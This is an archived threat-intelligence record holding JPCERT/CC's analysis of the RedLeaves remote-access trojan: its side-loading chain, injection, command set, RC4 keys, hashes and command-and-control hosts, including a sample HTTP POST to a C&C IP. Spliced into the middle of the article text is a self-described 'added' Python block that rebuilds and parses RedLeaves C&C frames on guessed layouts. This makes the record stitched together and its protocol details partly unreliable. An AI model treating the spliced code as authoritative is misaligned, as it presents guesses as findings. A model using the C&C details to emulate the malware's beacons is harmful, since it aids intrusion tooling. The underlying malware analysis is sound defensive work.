{
	"id": "604b2cc1-eb35-4b22-9ca0-99bd7182828c",
	"created_at": "2026-04-06T00:16:13.952181Z",
	"updated_at": "2026-04-10T03:30:11.945042Z",
	"deleted_at": null,
	"sha1_hash": "dbb37b1a14f59614ff5764adc6813452847410a0",
	"title": "RedLeaves - Malware Based on Open Source RAT - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 994116,
	"plain_text": "RedLeaves - Malware Based on Open Source RAT - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2017-04-02 · Archived: 2026-04-05 20:12:55 UTC\r\nHi again, this is Shusei Tomonaga from the Analysis Center.\r\nSince around October 2016, JPCERT/CC has been confirming information leakage and other damage caused by the malware ‘RedLeaves’. It is a new type of malware, observed since 2016 as an attachment to targeted emails.\r\nThis entry introduces RedLeaves and the results of our analysis, including its relation to PlugX and the open-source tool on which it is based.\r\nHow RedLeaves runs\r\nRedLeaves ends up injected into an Internet Explorer process through the following steps (Figure 1):\r\nFigure 1: Flow of events until RedLeaves runs\r\nThe malware samples that JPCERT/CC has analysed create the following three files in the %TEMP% folder and then execute the legitimate application:\r\nA legitimate application (EXE file): a signed executable that loads a DLL located in the same folder\r\nA loader (DLL file): a malicious DLL loaded by the legitimate application\r\nEncoded RedLeaves (DATA file): encoded data read by the loader\r\nWhen the legitimate application runs, it loads the loader from its own folder through DLL hijacking (DLL preloading, also known as DLL side-loading). Because the host executable is legitimately signed, the signature alone says nothing about the DLL it pulls in.\r\nThe loader, now running inside the legitimate application, reads and decodes the encoded RedLeaves and executes it. The decoded RedLeaves launches a process (Internet Explorer, as specified in its configuration) and injects itself into it. RedLeaves then runs from inside the injected process. 
The following section explains the behaviour of the injected RedLeaves.\r\nBehaviour of RedLeaves\r\nRedLeaves communicates with specific sites over HTTP or over its own custom protocol and executes the commands it receives. Figure 2 shows the PE header of the injected RedLeaves: the ‘MZ’ and ‘PE’ signatures have been overwritten with 0xFF 0xFF, so the in-memory image does not look like a PE file to simple signature scans of process memory.\r\nFigure 2: Injected RedLeaves\r\nThe injected RedLeaves connects to command and control (C\u0026C) servers by HTTP POST request or by its custom protocol. The destination hosts and the communication mode are specified in its configuration; see Appendix A.\r\nBelow is an example of the HTTP POST request. Tables B-1 and B-2 in Appendix B describe the format of the data sent. Note that this sample sends a plain HTTP POST to port 443; a detection that assumes port 443 carries only TLS will miss it.\r\nPOST /YJCk8Di/index.php\r\nConnection: Keep-Alive\r\nAccept: */*\r\nContent-Length: 140\r\nHost: 67.205.132.17:443\r\n[Data]\r\nThe data is encrypted with RC4 (the key is stored in the configuration) and, once decrypted, contains the following:\r\n__msgid=23.__serial=0.clientid=A58D72524B51AA4DBBB70431BD3DBBE9\r\nThe data received from the C\u0026C servers contains commands. Depending on the command received, RedLeaves executes one of the following functions (see Table B-3 in Appendix B for the structure of the received data):\r\nOperation on files\r\nExecute arbitrary shell commands\r\nConfigure communication methods\r\nSend drive information\r\nSend system information\r\nUpload/download files\r\nScreen capture\r\nExecute proxy function\r\nBase of RedLeaves’s Code\r\nJPCERT/CC analysed RedLeaves and confirmed that its code has a lot in common with the source code of Trochilus [1], a RAT (Remote Administration Tool) available on GitHub. Figure 3 shows the part of Trochilus’s code that processes received data. 
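The framing described above (Table B-1 for the HTTP POST body, Table B-2 for the custom protocol) and the key=value fields that the Trochilus routine in Figure 3 processes, as an added worked example written for this page. It is not code from the JPCERT/CC post or from Trochilus. The RC4 key is one of those listed in Appendix A; the following are assumptions made here and not stated on the page: the 4-byte fields are little-endian, the fixed values and the random value are placeholders, the Length field of Table B-2 covers the bytes that follow it, and '.' is taken as the field separator exactly as it is rendered on the page (in real traffic it may be a different byte).

```python
# Added worked example (not code from the JPCERT/CC post or from Trochilus):
# frame, encrypt, decrypt and parse RedLeaves-style C&C data as laid out in
# Tables B-1 and B-2 and in the HTTP POST body shown in the post.
# ASSUMPTIONS: 4-byte fields are little-endian; FIXED_VALUE and the TCP nonce
# are placeholders; the Table B-2 Length field counts the bytes that follow it;
# '.' is the field separator exactly as rendered on the page.

RC4_KEY = b'Lucky123'   # one of the RC4 keys listed in Appendix A
FIXED_VALUE = 0         # placeholder; the real constant is not given on the page

def rc4(key: bytes, data: bytes) -> bytes:
    '''Plain RC4 (KSA + PRGA); encryption and decryption are the same operation.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor4(value: int, key: bytes) -> bytes:
    '''Encode a 32-bit field by XORing it with the first four bytes of the RC4 key.'''
    raw = value.to_bytes(4, 'little')
    return bytes(a ^ b for a, b in zip(raw, key[:4]))

def unxor4(field: bytes, key: bytes) -> int:
    '''Inverse of xor4 (XOR is its own inverse).'''
    return int.from_bytes(bytes(a ^ b for a, b in zip(field, key[:4])), 'little')

def build_http_body(plaintext: bytes, server_id: int, key: bytes = RC4_KEY) -> bytes:
    '''Table B-1: enc_len^key[:4] | server_id^key[:4] | fixed | RC4(plaintext).'''
    enc = rc4(key, plaintext)
    return xor4(len(enc), key) + xor4(server_id, key) + FIXED_VALUE.to_bytes(4, 'little') + enc

def parse_http_body(body: bytes, key: bytes = RC4_KEY) -> dict:
    '''Inverse of build_http_body. The decoded length field doubles as a cheap
    key check: with the wrong first four key bytes it will not match the
    ciphertext actually present, so we refuse to decrypt rather than return junk.'''
    if len(body) < 12:
        raise ValueError('body shorter than the 12-byte header')
    enc_len = unxor4(body[0:4], key)
    enc = body[12:]
    if enc_len != len(enc):
        raise ValueError(f'declared length {enc_len} != {len(enc)} bytes present (wrong key?)')
    return {
        'server_id': unxor4(body[4:8], key),
        'fixed': int.from_bytes(body[8:12], 'little'),
        'plaintext': rc4(key, enc),
    }

def build_tcp_frame(plaintext: bytes, server_id: int, key: bytes = RC4_KEY,
                    nonce: int = 0x1234ABCD) -> bytes:
    '''Table B-2: random | fixed | length | <Table B-1 body>.'''
    inner = build_http_body(plaintext, server_id, key)
    return (nonce.to_bytes(4, 'little') + FIXED_VALUE.to_bytes(4, 'little')
            + len(inner).to_bytes(4, 'little') + inner)

def parse_tcp_frame(frame: bytes, key: bytes = RC4_KEY) -> dict:
    '''Inverse of build_tcp_frame; checks the outer length before decrypting.'''
    if len(frame) < 24:
        raise ValueError('frame shorter than the 24-byte header')
    length = int.from_bytes(frame[8:12], 'little')
    inner = frame[12:12 + length]
    if len(inner) != length:
        raise ValueError(f'truncated frame: expected {length} bytes, got {len(inner)}')
    return parse_http_body(inner, key)

def parse_fields(plaintext: bytes, sep: str = '.') -> dict:
    '''Split the decrypted body into the key=value fields of Table B-3.'''
    fields = {}
    for item in plaintext.decode('ascii').split(sep):
        if '=' in item:
            name, value = item.split('=', 1)
            fields[name] = value
    return fields

if __name__ == '__main__':
    # Constructed beacon: the plaintext shown in the post, with server id 1.
    beacon = b'__msgid=23.__serial=0.clientid=A58D72524B51AA4DBBB70431BD3DBBE9'
    body = build_http_body(beacon, server_id=1)
    print('Content-Length:', len(body))
    print(parse_fields(parse_http_body(body)['plaintext']))
    print(parse_fields(parse_tcp_frame(build_tcp_frame(beacon, 1))['plaintext']))
    try:
        parse_http_body(body, key=b'problems')   # another key from Appendix A
    except ValueError as err:
        print('wrong key rejected:', err)
```

For captured traffic, try each key from Appendix A (or one carved from the configuration at offset 0x82A) and keep the one for which the decoded length matches the ciphertext length. That check only covers the first four key bytes, so two keys sharing a prefix would both pass it; the decrypted body should still split cleanly into __msgid and __serial fields before the key is trusted.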
It is clear that it processes the same fields as those listed in Table B-3 in Appendix B.\r\nFigure 3: Part of Trochilus’s source code\r\nIt is therefore presumed that RedLeaves was built on top of Trochilus’s source code rather than from scratch.\r\nRelation to PlugX\r\nComparing the RedLeaves samples that JPCERT/CC has observed with PlugX, which certain attacker groups have used in the past, we identified similar code in some routines. Below is the sequence of instructions observed when each sample creates its three files (a legitimate application, a loader, and encoded RedLeaves or PlugX).\r\nFigure 4: Comparison of file creation process\r\nFurthermore, the routine in which the loader decodes the encoded data (encoded RedLeaves or PlugX) is also similar.\r\nFigure 5: Comparison of file decode process\r\nJPCERT/CC has also confirmed that some of the RedLeaves and PlugX samples that share the above code communicate with common hosts. From this observation, it is presumed that the attacker group using RedLeaves may have used PlugX before.\r\nSummary\r\nRedLeaves is a new type of malware observed since 2016 as an attachment to targeted emails. Attacks using this malware may continue.\r\nThe hash values of the samples introduced here are listed in Appendix C. Some of the RedLeaves destination hosts that JPCERT/CC has confirmed are listed in Appendix D. 
Please check your devices for any suspicious communication with these hosts.\r\n- Shusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] Trochilus: A fast\u0026free windows remote administration Tool, https://github.com/5loyd/trochilus\r\nAppendix A: Configuration information\r\nTable A: List of Configuration Information\r\nOffset | Description | Remarks\r\n0x000 | Destination 1 | \r\n0x040 | Destination 2 | \r\n0x080 | Destination 3 | \r\n0x0C0 | Port number | \r\n0x1D0 | Communication mode | 1=TCP, 2=HTTP, 3=HTTPS, 4=TCP and HTTP\r\n0x1E4 | ID | \r\n0x500 | Mutex | \r\n0x726 | Injection Process | \r\n0x82A | RC4 key | Used for encrypting communication\r\nRC4 key examples:\r\nLucky123\r\nproblems\r\n20161213\r\njohn1234\r\nminasawa\r\nAppendix B: Communicated data\r\nTable B-1: Format of data sent through HTTP POST request\r\nOffset | Length | Contents\r\n0x00 | 4 | Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x04 | 4 | Server id (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x08 | 4 | Fixed value\r\n0x0C | - | Data encrypted with RC4\r\nTable B-2: Format of data sent through its custom protocol\r\nOffset | Length | Contents\r\n0x00 | 4 | Random numerical value\r\n0x04 | 4 | Fixed value\r\n0x08 | 4 | Length\r\n0x0C | 4 | Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x10 | 4 | Server id (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x14 | 4 | Fixed value\r\n0x18 | - | Data encrypted with RC4\r\nTable B-3: Contents in received data\r\nString | Type | Contents\r\n__msgid | Numeric | Command\r\n__serial | Numeric | \r\n__upt | true, etc. | 
Whether the command is executed by a thread\r\n__data | data | Command parameter, etc.\r\nAppendix C: SHA-256 hash values of the samples\r\nRedLeaves\r\n5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481\r\nPlugX\r\nfcccc611730474775ff1cfd4c60481deef586f01191348b07d7a143d174a07b0\r\nAppendix D: Communication destination hosts\r\nmailowl.jkub.com\r\nwindowsupdates.itemdb.com\r\nmicrosoftstores.itemdb.com\r\n67.205.132.17\r\n144.168.45.116\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensic investigation, and is especially involved in analysing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security monitoring and analysis operations at a foreign-affiliated IT vendor. He has presented at CODE BLUE, BSidesLV, Black Hat USA Arsenal, Botconf, PacSec and the FIRST Conference. JSAC organizer.\r\nSource: https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html"
	],
	"report_names": [
		"redleaves---malware-based-on-open-source-rat.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434573,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dbb37b1a14f59614ff5764adc6813452847410a0.pdf",
		"text": "https://archive.orkl.eu/dbb37b1a14f59614ff5764adc6813452847410a0.txt",
		"img": "https://archive.orkl.eu/dbb37b1a14f59614ff5764adc6813452847410a0.jpg"
	}
}